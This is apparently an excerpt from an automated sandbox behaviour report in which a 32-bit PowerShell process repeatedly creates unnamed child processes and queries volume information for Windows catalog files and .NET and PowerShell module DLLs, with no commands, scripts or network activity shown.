Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
